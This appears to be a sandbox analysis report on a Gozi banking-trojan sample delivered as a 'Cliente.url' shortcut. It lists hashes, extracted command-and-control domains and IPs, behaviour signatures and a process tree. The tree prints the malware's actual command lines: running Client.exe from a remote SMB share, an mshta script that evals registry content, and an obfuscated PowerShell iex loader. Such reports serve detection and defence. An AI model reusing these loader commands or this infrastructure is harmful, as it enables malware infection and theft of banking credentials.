Analysis
- max time kernel: 151s
- max time network: 156s
- platform: windows10-2004_x64
- resource: win10v2004-20230915-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28-09-2023 13:16
Static task: static1
Behavioral task: behavioral1
Sample: Cliente.url
Resource: win7-20230831-en
General
- Target: Cliente.url
- Size: 192B
- MD5: 78078edede0301883d16ec812fd6bc3c
- SHA1: bb501ff7b5a6074c5a3478b1137305af1daab8cd
- SHA256: 1f4bca4ce6d93b64a82d2e3ba1d2b876f2ad455f311768922e32377f3923db8f
- SHA512: 7b9ce5672c131ce7e8e3d8857c9ce292481ec1c95c7b1243838c30be1dad2bf21b52d39bb8df3a2e11e5b089462b6ecac630ebb3d992f215bf28e2256148f2a0
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
- base_path: /jerry/
- build: 250260
- exe_type: loader
- extension: .bob
- server_id: 50
Extracted
gozi
5050
31.41.44.79
185.248.144.203
netsecurez.com
whofoxy.com
- base_path: /pictures/
- build: 250260
- exe_type: worker
- extension: .bob
- server_id: 50
Signatures
-
Dave packer 1 IoCs
Detects an executable using a packer that the community has named 'Dave', based on a string at the end.
Processes:
- resource: behavioral2/memory/2984-1-0x0000000000470000-0x000000000047C000-memory.dmp; yara_rule: dave
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation (process: rundll32.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation (process: mshta.exe)
Suspicious use of SetThreadContext 8 IoCs
Processes:
- PID 1324 (powershell.exe) set thread context of 3248 (Explorer.EXE)
- PID 3248 (Explorer.EXE) set thread context of 3756 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) set thread context of 3988 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) set thread context of 4844 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) set thread context of 3684 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) set thread context of 548 (cmd.exe)
- PID 3248 (Explorer.EXE) set thread context of 4880 (cmd.exe)
- PID 548 (cmd.exe) set thread context of 1608 (PING.EXE)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 3 IoCs
Processes:
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (process: Explorer.EXE)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ (process: Explorer.EXE)
- Key created: \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ (process: Explorer.EXE)
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
- PID 1608: PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- PID 2984: Client.exe
- PID 1324: powershell.exe
- PID 3248: Explorer.EXE
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- PID 3248: Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
- PID 1324: powershell.exe
- PID 3248: Explorer.EXE
- PID 548: cmd.exe
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
- Token: SeDebugPrivilege (PID 1324, powershell.exe)
- Token: SeShutdownPrivilege (PID 3248, Explorer.EXE)
- Token: SeCreatePagefilePrivilege (PID 3248, Explorer.EXE)
- Token: SeManageVolumePrivilege (PID 2172, svchost.exe)
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
- PID 3248: Explorer.EXE
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- PID 3248: Explorer.EXE
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
- PID 1464 (rundll32.exe) wrote to memory of 2984 (Client.exe)
- PID 3724 (mshta.exe) wrote to memory of 1324 (powershell.exe)
- PID 1324 (powershell.exe) wrote to memory of 3868 (csc.exe)
- PID 3868 (csc.exe) wrote to memory of 4640 (cvtres.exe)
- PID 1324 (powershell.exe) wrote to memory of 832 (csc.exe)
- PID 832 (csc.exe) wrote to memory of 2484 (cvtres.exe)
- PID 1324 (powershell.exe) wrote to memory of 3248 (Explorer.EXE)
- PID 3248 (Explorer.EXE) wrote to memory of 3756 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) wrote to memory of 3988 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) wrote to memory of 4844 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) wrote to memory of 3684 (RuntimeBroker.exe)
- PID 3248 (Explorer.EXE) wrote to memory of 548 (cmd.exe)
- PID 3248 (Explorer.EXE) wrote to memory of 4880 (cmd.exe)
- PID 548 (cmd.exe) wrote to memory of 1608 (PING.EXE)
Processes
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  Signatures: Suspicious use of SetThreadContext; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\rundll32.exe
    Command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Cliente.url
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - \??\UNC\62.173.146.12\Scarica\Client.exe
      Command line: "\\62.173.146.12\Scarica\Client.exe"
      Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Nodw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nodw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kmkrdv -value gp; new-alias -name nrpxiw -value iex; nrpxiw ([System.Text.Encoding]::ASCII.GetString((kmkrdv "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u2jo5d1i\u2jo5d1i.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A.tmp" "c:\Users\Admin\AppData\Local\Temp\u2jo5d1i\CSCAA9961F06BCC497FBEA57E37F96FA643.TMP"
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r3exlv5m\r3exlv5m.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES162.tmp" "c:\Users\Admin\AppData\Local\Temp\r3exlv5m\CSCF840EBCFF1BD45E78D1E6A4CB6C134F6.TMP"
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.146.12\Scarica\Client.exe"
    Signatures: Suspicious use of SetThreadContext; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE
      Command line: ping localhost -n 5
      Signatures: Runs ping.exe; Suspicious behavior: CmdExeWriteProcessMemorySpam
  - C:\Windows\syswow64\cmd.exe
    Command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\rundll32.exe
  Command line: "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
- C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k UnistackSvcGroup
  Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads